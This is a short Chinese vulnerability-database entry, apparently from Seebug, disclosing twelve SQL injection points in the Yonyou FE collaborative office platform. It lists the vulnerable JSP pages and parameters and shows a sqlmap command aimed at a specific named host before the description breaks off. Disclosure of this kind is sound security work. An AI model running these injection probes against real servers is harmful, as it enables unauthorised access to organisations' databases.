用友FE通用系统漏洞打包之一

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友通用系统漏洞打包#1 ### 详细说明: 看了一天的时间,把发现的漏洞一起打包了 总共包含用友FE协同办公平台通用系统漏洞打包,包含12个SQL注入漏洞,总不会都重复嘛 漏洞的文件及参数为: ``` /sys/left.jsp?lx=1 /sys/regUI.jsp?regName=111 /sys/regListUI.jsp?searchKeyvalue=111 /sys/plugin/plugin_form_edit.jsp?done=&key=a /security/check.jsp?name=1&id=1 /sys/plugin/plugin_datasource_edit.jsp?done=&key=a /permissionsreport/pMonitor.jsp?photoId=1&modelid=111 /fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync /fenc/ncsubjass.jsp?subjcode=1 /cooperate/flow/selectUDR.jsp?id=1 /cooperate/flow/selectMUDR.jsp?id=1 /common/selectUDRTree.jsp?id=1 ``` 1)sql注入1 /sys/plugin/plugin_form_edit.jsp?done=&key=a sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a" [<img src="https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg) 2)sql注入2 /sys/regUI.jsp?regName=111 sqlmap -u...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息